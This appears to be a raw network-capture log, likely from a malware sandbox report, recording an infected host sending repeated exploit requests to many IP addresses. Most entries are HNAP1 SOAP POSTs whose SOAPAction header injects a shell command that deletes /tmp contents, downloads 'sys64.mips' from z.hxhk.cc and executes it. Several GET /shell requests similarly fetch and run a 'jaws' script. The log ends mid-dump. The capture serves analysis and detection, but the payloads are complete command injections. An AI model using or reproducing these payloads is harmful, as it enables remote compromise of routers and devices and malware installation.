74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Mar 18, 2024 09:57:03.978024960 CET	764	OUT	POST /HNAP1/ HTTP/1.0 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s` Content-Length: 640 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Mar 18, 2024 09:57:10.133164883 CET	764	OUT	POST /HNAP1/ HTTP/1.0 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s` Content-Length: 640 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Mar 18, 2024 09:57:22.166861057 CET	764	OUT	POST /HNAP1/ HTTP/1.0 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s` Content-Length: 640 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Mar 18, 2024 09:57:47.250761032 CET	764	OUT	POST /HNAP1/ HTTP/1.0 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s` Content-Length: 640 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Mar 18, 2024 09:58:36.380991936 CET	764	OUT	POST /HNAP1/ HTTP/1.0 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s` Content-Length: 640 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.23	52460	45.223.127.179	8081

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:56:58.645252943 CET	776	OUT	POST /HNAP1/ HTTP/1.0 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s` Content-Length: 640 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Mar 18, 2024 09:56:59.466649055 CET	776	OUT	POST /HNAP1/ HTTP/1.0 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s` Content-Length: 640 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.23	33678	172.173.117.250	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:56:59.192599058 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive
Mar 18, 2024 09:56:59.325949907 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Mon, 18 Mar 2024 08:56:59 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.23	47934	83.143.132.22	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:56:59.247692108 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive
Mar 18, 2024 09:56:59.847625971 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive
Mar 18, 2024 09:57:00.036897898 CET	420	IN	HTTP/1.1 400 Bad Request Date: Mon, 18 Mar 2024 08:56:59 GMT Server: Apache X-SERVER: 1165 Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 